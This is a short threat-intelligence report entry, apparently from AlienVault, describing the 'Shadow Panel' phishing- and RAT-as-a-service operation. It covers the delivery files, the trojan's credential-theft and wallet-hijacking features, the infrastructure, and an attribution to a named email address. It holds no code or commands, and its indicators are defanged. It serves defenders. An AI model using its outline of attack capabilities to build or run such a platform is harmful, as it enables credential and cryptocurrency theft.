REFUNDEE: Inside a Shadow Panel Phishing-as-a-Service Operation
Essential information
- Published
- 13/04/2026 17:06
- Modified
- 13/04/2026 15:48
- Source / Author
- AlienVault
- Confidence
- 100/100
- Report type(s)
- threat-report
- Labels / Tags
- bulgarian-infrastructure cryptocurrency-theft phishing-as-a-service powershell rat-as-a-service refundee shadow panel shadow-panel spanish-portuguese-targeting webdav
- Tags
- 2026-04-13 bulgarian-infrastructure cryptocurrency theft phishing-as-a-service powershell rat-as-a-service refundee shadow panel spanish-portuguese-targeting webdav
- Related entities
- 25 indicators, 25 observables, 20 techniques (mitre), 2 malware, 8 others
Description
An open directory discovery at refundonex[.]com exposed a complete Phishing-as-a-Service and RAT-as-a-Service platform targeting Spanish and Portuguese-speaking victims. The investigation uncovered 3,788 files including weaponized LNK, VBS, and AES-encrypted PowerShell payloads delivering a remote access trojan. The platform, called Shadow Panel, operates from Bulgarian infrastructure and offers capabilities including remote shell execution, screenshot capture, file management, browser credential theft, clipboard hijacking for cryptocurrency wallets, and multi-operator support. The C2 panel's frontend JavaScript was publicly accessible, revealing 29 API endpoints and the complete architecture. Infrastructure analysis linked the operation to nikola4010@proton[.]me through WHOIS data and historical malicious domain associations dating back to 2021, indicating a long-running cybercriminal operation with minimal detection coverage.